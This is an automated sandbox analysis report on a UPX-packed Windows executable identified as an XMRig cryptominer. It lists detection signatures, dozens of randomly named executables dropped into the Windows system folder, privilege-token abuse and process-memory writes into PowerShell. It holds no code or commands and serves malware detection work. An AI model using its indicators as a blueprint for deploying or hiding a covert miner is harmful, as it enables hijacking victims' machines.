Malware Analysis Report

2025-04-19 16:45

Sample ID 240522-ysjhnsef63
Target 28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe
SHA256 88d498f4d42a07692cb4d0edcf02a7c3ca3598887220738da2582cbe90fc065f
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

88d498f4d42a07692cb4d0edcf02a7c3ca3598887220738da2582cbe90fc065f

Threat Level: Known bad

The file 28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

XMRig Miner payload

xmrig

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

UPX packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 20:02

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 20:02

Reported

2024-05-22 20:05

Platform

win7-20231129-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\pXSoYZz.exe N/A
N/A N/A C:\Windows\System\qBRtaYh.exe N/A
N/A N/A C:\Windows\System\vZkSTFH.exe N/A
N/A N/A C:\Windows\System\qerrWAq.exe N/A
N/A N/A C:\Windows\System\OaEkGuw.exe N/A
N/A N/A C:\Windows\System\aUlFtTb.exe N/A
N/A N/A C:\Windows\System\qYoPpGV.exe N/A
N/A N/A C:\Windows\System\uYVGRiR.exe N/A
N/A N/A C:\Windows\System\wVwzWGE.exe N/A
N/A N/A C:\Windows\System\WfNyiIg.exe N/A
N/A N/A C:\Windows\System\QcpeRow.exe N/A
N/A N/A C:\Windows\System\QSflFyD.exe N/A
N/A N/A C:\Windows\System\wpejEsJ.exe N/A
N/A N/A C:\Windows\System\oJsrytP.exe N/A
N/A N/A C:\Windows\System\kkRNIDH.exe N/A
N/A N/A C:\Windows\System\ywqOfnx.exe N/A
N/A N/A C:\Windows\System\osZTcHW.exe N/A
N/A N/A C:\Windows\System\OALhLOE.exe N/A
N/A N/A C:\Windows\System\hIcBbjX.exe N/A
N/A N/A C:\Windows\System\FOEFUBv.exe N/A
N/A N/A C:\Windows\System\sxrCPjT.exe N/A
N/A N/A C:\Windows\System\ioHcfky.exe N/A
N/A N/A C:\Windows\System\eVRYZnG.exe N/A
N/A N/A C:\Windows\System\njshNOE.exe N/A
N/A N/A C:\Windows\System\ZvvUIkk.exe N/A
N/A N/A C:\Windows\System\yhJwsGc.exe N/A
N/A N/A C:\Windows\System\BuCvjyN.exe N/A
N/A N/A C:\Windows\System\onknRvH.exe N/A
N/A N/A C:\Windows\System\ayjxpqf.exe N/A
N/A N/A C:\Windows\System\HThQyoT.exe N/A
N/A N/A C:\Windows\System\DYNxzJK.exe N/A
N/A N/A C:\Windows\System\yfpynUr.exe N/A
N/A N/A C:\Windows\System\ZcOcYqB.exe N/A
N/A N/A C:\Windows\System\eWHziDz.exe N/A
N/A N/A C:\Windows\System\uLQqzMA.exe N/A
N/A N/A C:\Windows\System\BuyXkLY.exe N/A
N/A N/A C:\Windows\System\TkzhEyW.exe N/A
N/A N/A C:\Windows\System\FHcqNtk.exe N/A
N/A N/A C:\Windows\System\tyMgZVL.exe N/A
N/A N/A C:\Windows\System\wZDMmNI.exe N/A
N/A N/A C:\Windows\System\xKcwMjq.exe N/A
N/A N/A C:\Windows\System\cNrTNlQ.exe N/A
N/A N/A C:\Windows\System\FDrzNCv.exe N/A
N/A N/A C:\Windows\System\qtRDnhb.exe N/A
N/A N/A C:\Windows\System\TPwRdWY.exe N/A
N/A N/A C:\Windows\System\YvmTsDd.exe N/A
N/A N/A C:\Windows\System\CQdqjpb.exe N/A
N/A N/A C:\Windows\System\qhMoLjq.exe N/A
N/A N/A C:\Windows\System\EBNmXNG.exe N/A
N/A N/A C:\Windows\System\HlzymDa.exe N/A
N/A N/A C:\Windows\System\RyEbOmJ.exe N/A
N/A N/A C:\Windows\System\mwoSuOn.exe N/A
N/A N/A C:\Windows\System\Npsbsad.exe N/A
N/A N/A C:\Windows\System\pcLROOO.exe N/A
N/A N/A C:\Windows\System\zKeomja.exe N/A
N/A N/A C:\Windows\System\NvKDWaX.exe N/A
N/A N/A C:\Windows\System\ZPkfLut.exe N/A
N/A N/A C:\Windows\System\rUtPhvs.exe N/A
N/A N/A C:\Windows\System\Ispnnpr.exe N/A
N/A N/A C:\Windows\System\RBopSjv.exe N/A
N/A N/A C:\Windows\System\zfGbBaD.exe N/A
N/A N/A C:\Windows\System\DFXvzPW.exe N/A
N/A N/A C:\Windows\System\msHQlOJ.exe N/A
N/A N/A C:\Windows\System\cAfsQcJ.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\AdTQMUY.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\IyhJtfv.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\rqGjZUB.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\eKiRrrn.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\iWHOqxe.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\FMQAxls.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\gdpaAHc.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\AJecOwO.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\PobvAyy.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\cHsJVZH.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\mMkeUBO.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\uQbORYu.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\QOQBcKF.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\tlBpDQu.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\XTwzqwL.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\hQkwXMa.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\CEFEhWh.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\fTVgZoy.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\vyzrkaY.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\ePkQiSG.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\cRQaSaY.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\ySmSUdg.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\FPqIlpr.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\nwZgGyT.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\XediUdE.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\gMIgktJ.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\RVfXGjh.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\nGratfy.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\VICFFgo.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\gjlCRMB.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\zecIaRE.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\YeUkRRM.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\WyzEFOv.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\BbxFPWC.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\QEQtZqc.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\uzmOMjF.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\imkjwrQ.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\emfHxnR.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\pPwFQsu.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\msHQlOJ.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\AaWotKq.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\oIQekWQ.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\mSqtfpf.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\fZeAJjZ.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\xuUSWFN.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\xFAjOxq.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\zSvbpQP.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\cmFBDLJ.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\pXSoYZz.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\SlMniGd.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\AHnBTzn.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\nqllPUV.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\CrsZsqz.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\lHinZJs.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\DDhJfNB.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\ywAqGov.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\abFOLap.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\SFFNYhg.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\LBJQTcu.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\WeRiemW.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\TXNAxNw.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\rZRdzXr.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\aFUOzgo.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\iSbKQRb.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3004 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3004 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3004 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3004 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\pXSoYZz.exe
PID 3004 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\pXSoYZz.exe
PID 3004 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\pXSoYZz.exe
PID 3004 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\vZkSTFH.exe
PID 3004 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\vZkSTFH.exe
PID 3004 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\vZkSTFH.exe
PID 3004 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qBRtaYh.exe
PID 3004 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qBRtaYh.exe
PID 3004 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qBRtaYh.exe
PID 3004 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\OaEkGuw.exe
PID 3004 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\OaEkGuw.exe
PID 3004 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\OaEkGuw.exe
PID 3004 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qerrWAq.exe
PID 3004 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qerrWAq.exe
PID 3004 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qerrWAq.exe
PID 3004 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qYoPpGV.exe
PID 3004 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qYoPpGV.exe
PID 3004 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qYoPpGV.exe
